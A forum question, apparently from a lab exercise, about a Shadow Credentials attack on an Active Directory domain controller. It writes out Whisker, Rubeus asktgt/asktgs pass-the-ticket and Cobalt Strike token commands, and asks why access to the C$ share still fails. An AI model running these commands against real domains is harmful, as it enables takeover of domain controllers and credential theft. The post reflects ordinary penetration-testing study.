
Shadow Credentials attack with TGT and TGS

Çağlar Arlı

I am trying to replicate the Shadow Credentials attack in an Active Directory environment. My initial approach was to:

  1. Use Whisker to create a new certificate on behalf of DC (successful):

    Whisker.exe add /target:dc-2$
    
  2. Use the newly created certificate with Rubeus and ask a new TGT:

    Rubeus.exe asktgt /user:dc$ /certificate:MIIJuAIBAzCCCXQ[snip cert] /password:"[certificate password]" /domain:[domain] /dc:dc-2.dev.cyberbotic.io /getcredentials /show /nowrap
    
  3. Create a fake logon session (I'm using Cobalt Strike):

    make_token [DC admin user] FakePass
    
  4. Use the TGT to request a new TGS for the CIFS service, which should allow me to access C$ and ADMIN$:

    Rubeus.exe asktgs /ticket:doIGajCCBmagAwI[snip TGT ticket...] /service:cifs/dc.domain.com,CIFS/dc.domain.com /nowrap /ptt
    

Now, in theory, I should be able to access C$, but every time I list the contents with ls \\dc\c$, I keep getting:

[-] could not open \\dc-2\c$\*: 1326 - ERROR_LOGON_FAILURE

Now, my initial theory was that using a TGS would also require a valid logon session on my side, and because I use a fake logon session, the machine would deny my list request. That should be easily bypassed by using the TGT directly, so I took the base64 ticket and saved it locally:

[System.IO.File]::WriteAllBytes("C:\Tickets\ticket.kirbi", [System.Convert]::FromBase64String("doIGajCCBmagAwI[snip TGT...]"))

Then I imported it into my fake logon session:

kerberos_ticket_use C:\Tickets\ticket.kirbi

Now, every time I try to list the DC's contents, I get:

[-] could not open \\dc-2\c$\*: 5 - ERROR_ACCESS_DENIED

I know that I am missing something in my knowledge, and that's why the attack is unsuccessful, but what am I missing?

UPDATE: I was able to find out why I got:

1326 - ERROR_LOGON_FAILURE

This is because I need to use the full FQDN when listing the contents of the target machine (dc.domain.com). Now I always get:

5 - ERROR_ACCESS_DENIED